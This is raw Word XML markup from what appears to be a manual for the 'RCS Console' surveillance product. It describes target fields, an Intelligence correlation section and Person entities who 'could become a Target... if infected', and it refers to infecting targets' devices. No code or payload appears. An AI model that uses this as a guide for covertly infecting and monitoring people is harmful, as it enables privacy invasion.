                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00051467">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00051467" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
            <w:r w:rsidR="00051467">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; New Target</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1079" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:237pt;height:123pt;z-index:251710464;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId38" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1079" DrawAspect="Content" ObjectID="_1446455342" r:id="rId39"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00AF27CF" w:rsidRDefault="00AF27CF" w:rsidP="00134262">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00AF27CF" w:rsidRPr="00240B6F" w:rsidRDefault="00AF27CF" w:rsidP="00134262">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00AF27CF" w:rsidRPr="00240B6F" w:rsidRDefault="00AF27CF" w:rsidP="00134262">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00674013" w:rsidRPr="00240B6F" w:rsidRDefault="00674013" w:rsidP="00674013">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w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>arget’s name.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00AF27CF" w:rsidRPr="00240B6F" w:rsidRDefault="00674013" w:rsidP="00134262">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is a not mandatory field </w:t>
            </w:r>
            <w:r w:rsidR="0025099E" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>to be used for storing additional information</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> about the </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:r w:rsidR="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>arget.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00AF27CF" w:rsidRDefault="00AF27CF" w:rsidP="00AF27CF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005C0614" w:rsidRDefault="005C0614" w:rsidP="005C0614">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0087756C" w:rsidRDefault="0087756C" w:rsidP="0062523F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0087756C" w:rsidRDefault="0087756C" w:rsidP="0062523F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sectPr w:rsidR="0087756C" w:rsidSect="00CE07E2">
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="1418" w:right="1134" w:bottom="1134" w:left="1134" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A719CD" w:rsidRDefault="00A719CD" w:rsidP="00A719CD">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc372642482"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Intelligence</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w:rsidR="0087756C" w:rsidRDefault="0087756C" w:rsidP="00A719CD">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc372642483"/>
      <w:r>
        <w:t>Intelligence Logic and Capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="0087756C" w:rsidRDefault="0087756C" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001D4DA3" w:rsidRDefault="001D4DA3" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="001D4DA3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Intelligence </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">section </w:t>
      </w:r>
      <w:r w:rsidRPr="001D4DA3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">supports the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Event Analysts </w:t>
      </w:r>
      <w:r w:rsidRPr="001D4DA3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in processing the investigation evidence and data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0087756C" w:rsidRDefault="001D4DA3" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">It is </w:t>
      </w:r>
      <w:r w:rsidR="00C9792B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">automatically </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">filled with </w:t>
      </w:r>
      <w:r w:rsidR="00C9792B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Operations </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">objects </w:t>
      </w:r>
      <w:r w:rsidR="00C9792B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="003B0583">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allows to focus on two important aspects:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B0583" w:rsidRDefault="003B0583" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B0583" w:rsidRPr="003B0583" w:rsidRDefault="00134262" w:rsidP="00134262">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The opportunity to pre-load within the system any </w:t>
      </w:r>
      <w:r w:rsidR="00DD78A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">external </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">information about a specific investigation </w:t>
      </w:r>
      <w:r w:rsidR="00DD78A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>before</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> infecting </w:t>
      </w:r>
      <w:r w:rsidR="00FC58A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>argets</w:t>
      </w:r>
      <w:r w:rsidR="00DD78A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> devices</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B0583" w:rsidRDefault="003B0583" w:rsidP="00134262">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B0583" w:rsidRDefault="00134262" w:rsidP="00134262">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The convenience of having </w:t>
      </w:r>
      <w:r w:rsidR="00DD78A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">a unique and always updated investigation environment, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>with relevant evidences automatically highlighted by the system;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B0583" w:rsidRPr="003B0583" w:rsidRDefault="003B0583" w:rsidP="00134262">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B0583" w:rsidRDefault="003B0583" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The image below</w:t>
      </w:r>
      <w:r w:rsidR="00DD78A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> shows a correlation graph achieved through the combination of information provided by Evidence Analysts and data automatically </w:t>
      </w:r>
      <w:r w:rsidR="00C7119C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">collected </w:t>
      </w:r>
      <w:r w:rsidR="00DD78A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>by the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00683B2D" w:rsidRDefault="00683B2D" w:rsidP="0087756C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00683B2D" w:rsidRDefault="00683B2D" w:rsidP="0087756C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="770724AB" wp14:editId="6816B8BE">
            <wp:extent cx="6126480" cy="3657600"/>
            <wp:effectExtent l="0" t="0" r="762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480" cy="3657600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00683B2D" w:rsidRPr="003B0583" w:rsidRDefault="00683B2D" w:rsidP="0087756C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B0583" w:rsidRDefault="0010013A" w:rsidP="0087756C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="003B0583">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r w:rsidR="003B0583" w:rsidRPr="00957E2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="0059452D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0059626D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">RCS </w:t>
      </w:r>
      <w:r w:rsidR="0059452D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Console</w:t>
      </w:r>
      <w:r w:rsidR="003B0583" w:rsidRPr="00957E2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ] </w:t>
      </w:r>
      <w:r w:rsidR="003B0583">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intelligence</w:t>
      </w:r>
      <w:r w:rsidR="005C26A1">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="005C26A1" w:rsidRPr="00674013">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidR="008C7FB1">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="005C26A1" w:rsidRPr="00674013">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>peration #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE54A7" w:rsidRDefault="00BE54A7">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0087756C" w:rsidRPr="009C7990" w:rsidRDefault="0087756C" w:rsidP="00A719CD">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc372642484"/>
      <w:r w:rsidRPr="009C7990">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Entities </w:t>
      </w:r>
      <w:r w:rsidR="00FB566F">
        <w:t xml:space="preserve">and Links </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7990">
        <w:t>Creation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="0087756C" w:rsidRDefault="0087756C" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0087756C" w:rsidRDefault="00997DDC" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Within Intelligence section you can create </w:t>
      </w:r>
      <w:r w:rsidR="0049012F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">up to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">3 different types of </w:t>
      </w:r>
      <w:r w:rsidR="00FC58A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ntities, each of which allows to introduce a new distinct element inside your investigation logic, for a specific </w:t>
      </w:r>
      <w:r w:rsidR="00FC58A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>peration.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007914C7" w:rsidRDefault="007914C7" w:rsidP="00134262">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268"/>
        <w:gridCol w:w="8499"/>
      </w:tblGrid>
      <w:tr w:rsidR="00036C4C" w:rsidTr="006172B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="861" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00036C4C" w:rsidRDefault="00036C4C" w:rsidP="00134262">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="645" w:dyaOrig="900">
                <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:28.5pt;height:44.25pt" o:ole="">
                  <v:imagedata r:id="rId41" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1026" DrawAspect="Content" ObjectID="_1446455241" r:id="rId42"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00036C4C" w:rsidRDefault="00036C4C" w:rsidP="00134262">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00036C4C" w:rsidRPr="00671455" w:rsidRDefault="00671455" w:rsidP="00134262">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00671455">
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Person Entity</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00671455" w:rsidRDefault="00671455" w:rsidP="00671455">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">This type of </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">ntity represents a person involved in the </w:t>
            </w:r>
            <w:r w:rsidR="009E2BA0">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">ongoing </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>operation.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00671455" w:rsidRPr="00671455" w:rsidRDefault="00671455" w:rsidP="00FC58A7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">This person could become a </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>arget in the near future, if infected.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C24B7" w:rsidRPr="006172B5" w:rsidTr="006172B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="861" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C24B7" w:rsidRPr="006172B5" w:rsidRDefault="007C24B7" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C24B7" w:rsidRPr="006172B5" w:rsidRDefault="007C24B7" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C24B7" w:rsidRPr="006172B5" w:rsidRDefault="007C24B7" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C24B7" w:rsidRPr="005701FD" w:rsidTr="006172B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="861" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="007C24B7" w:rsidRPr="005701FD" w:rsidRDefault="007C24B7" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="007C24B7" w:rsidRPr="005701FD" w:rsidRDefault="007C24B7" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="007C24B7" w:rsidRPr="005701FD" w:rsidRDefault="007C24B7" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
